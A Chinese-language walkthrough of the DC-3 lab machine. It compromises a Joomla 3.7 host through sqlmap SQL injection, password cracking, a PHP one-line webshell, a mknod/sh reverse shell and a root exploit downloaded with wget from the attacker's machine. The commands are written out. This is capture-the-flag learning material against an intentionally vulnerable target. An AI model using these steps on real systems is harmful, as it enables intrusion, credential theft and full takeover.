DC-3

1、arp-scan -l 扫描目标主机192.168.168.195

2、查看目标主机详细信息

80端口开放，可以尝试访问一下发现只有一个flag，没有什么重要信息

3、nikto -host http://192.168.168.195 扫描一下

Nikto是一款开源的（GPL）网页服务器扫描器，它可以对网页服务器进行全面的多种扫描

发现一些目录，打开看一下
再打开README.txt看一下,发现Joomla版本为3.7

4、searchsploit joomla 搜索漏洞

（1）打开42033.txt看一下，存在sql注入，上面有详细的方法

sqlmap 注库名，重点关注一下joomla

sqlmap -u "http://192.168.168.195/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --dbs

5、注表名

sqlmap -u "http://192.168.168.195/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --tables -D joomladb

6、注列名

复制447227.php到/var/www/html/，开启apache服务，在浏览器中访问
target填http://192.168.168.195

将加密后的密文放入hash文档里，使用john破解一下，得到密码snoopy

7、现在，知道用户名为admin，密码为snoopy，尝试登录一下http://192.168.168.195/administrator/

写入phpinfo()试探一下，看能否成功显示


下面可以写入一句话木马

8、蚁剑连接

9、打开虚拟终端，发现是服务用户

写入nc反弹shell

发现不能使用-e反弹shell，可以采用下面的反弹shell
mknod /tmp/backpipe p
/bin/sh 0/tmp/backpipe
kali监听，成功反弹shell

python -c 'import pty;pty.spawn("/bin/sh")'开启一个交互式界面

10、下面考虑提权
下载好39772.zip，解压后放于kali的网站根目录下，开启Apache服务

获取到的用户界面下载脚本 wget http://192.168.168.194/39772

执行脚本

root权限，提权成功。